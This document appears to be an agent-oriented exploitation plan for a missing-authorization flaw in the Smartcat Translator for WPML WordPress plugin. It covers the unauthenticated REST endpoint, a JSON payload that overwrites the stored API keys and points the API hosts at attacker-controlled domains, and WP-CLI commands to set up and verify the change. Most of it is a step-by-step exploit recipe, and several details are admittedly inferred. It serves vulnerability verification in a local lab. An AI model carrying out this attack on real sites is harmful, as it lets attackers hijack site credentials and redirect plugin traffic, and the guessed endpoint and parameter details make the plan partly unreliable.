Exploitation Research Plan: CVE-2026-4683 Smartcat Translator for WPML

1. Vulnerability Summary

The Smartcat Translator for WPML plugin (up to version 3.1.77) contains a missing authorization vulnerability in its REST API implementation. Specifically, the routeData endpoint is registered without a proper permission_callback (or with a callback that fails to check for administrative capabilities), allowing unauthenticated users to submit POST requests that modify the plugin's core configuration. An attacker can overwrite Smartcat API credentials, effectively hijacking the translation workflow or causing a Denial of Service (DoS) by pointing the plugin to a malicious or non-existent API host.

2. Attack Vector Analysis

• Endpoint: /wp-json/smartcat/v1/routeData (Namespace smartcat/v1 is inferred from SMARTCAT_API_PREFIX in config.php).
• HTTP Method: POST
• Payload Format: JSON
• Authentication: None Required (Unauthenticated).
• Preconditions: The plugin must be active. WPML is technically a requirement for the plugin's operation, but the REST endpoint likely initializes regardless.

3. Code Flow

1. Registration: The plugin registers a REST route using register_rest_route(). Based on the description, this occurs in an initialization sequence (likely within includes/Services/API/ or a class initialized in SmartcatWpml.php).
2. Vulnerable Configuration: The route configuration for routeData lacks a permission_callback that restricts access to users with manage_options or activate_plugins capabilities. It may use __return_true or be omitted entirely.
3. Processing: The callback function associated with the route (e.g., update_route_data or handle_route_data) accepts parameters from the WP_REST_Request object.
4. Sink: The callback uses update_option() or a similar mechanism to save the following values into the WordPress database:
   • smartcat_account_id (inferred)
   • smartcat_api_key (inferred)
   • smartcat_hub_key (inferred)
   • smartcat_api_host (inferred)
   • smartcat_hub_host (inferred)

4. Nonce Acquisition Strategy

According to the WordPress REST API design, unauthenticated requests (those without a session cookie) do not require a _wpnonce or X-WP-Nonce header. Since this is an unauthenticated "Missing Authorization" vulnerability, no nonce is needed for the exploit payload if sent from a "clean" session.

Verification of absence of nonce requirement:
If the endpoint were intended for authenticated users, the plugin might enqueue a nonce in the admin UI.

• JS Localization Key: window.smartcat_data or window.sc_api_config (inferred).
• Extraction method:
  1. Use browser_navigate to the plugin settings page: /wp-admin/settings.php?page=smartcat-wpml.
  2. Use browser_eval to search for localized nonces.
     However, for unauthenticated exploitation, we will proceed by omitting the nonce.

5. Exploitation Strategy

The goal is to overwrite the Smartcat API settings to demonstrate unauthorized data modification.

Step 1: Discover the exact REST Route
Check the site's REST index to confirm the namespace and endpoint.

• Request: GET /wp-json/
• Tool: http_request

Step 2: Submit the Malicious Configuration
Send a POST request to the routeData endpoint with "attacker-controlled" values.

• Request URL: http://localhost:8080/wp-json/smartcat/v1/routeData
• Method: POST
• Headers: Content-Type: application/json
• Payload:

{
    "accountId": "VULNERABILITY_CONFIRMED_ACCOUNT",
    "apiKey": "VULNERABILITY_CONFIRMED_KEY",
    "hubKey": "VULNERABILITY_CONFIRMED_HUB",
    "apiHost": "https://malicious-api.example.com",
    "hubHost": "https://malicious-hub.example.com"
}

Note: Parameter names are based on admin/assets/js/smartcat-ui.js references to accountId, apiKey, etc.

6. Test Data Setup

1. Install Plugin: Ensure smartcat-wpml version 3.1.77 is installed and active.
2. Initial State: (Optional) Configure legitimate-looking dummy credentials using WP-CLI so that the change is more obvious.

   wp option update smartcat_account_id "original_id"
   wp option update smartcat_api_key "original_key"
   

7. Expected Results

• Response Code: 200 OK or 201 Created.
• Response Body: Likely a JSON success message like {"success": true} or returning the updated settings object.
• State Change: The WordPress options table should now contain the attacker's values.

8. Verification Steps

After performing the http_request, verify the modification via WP-CLI:

# Check updated options
wp option get smartcat_account_id
wp option get smartcat_api_key
wp option get smartcat_api_host

Confirm the output matches VULNERABILITY_CONFIRMED_ACCOUNT, etc.

9. Alternative Approaches

If the JSON keys in the payload differ (e.g., the plugin expects a nested object), analyze the admin/assets/js/smartcat-ui.js file more deeply for the registerCredentials function logic:

• Search for the string routeData in the plugin's PHP directory using grep -r "routeData" ..
• If the endpoint requires a specific "hub key" format to validate, it may be necessary to match the structure expected by the HubClient class.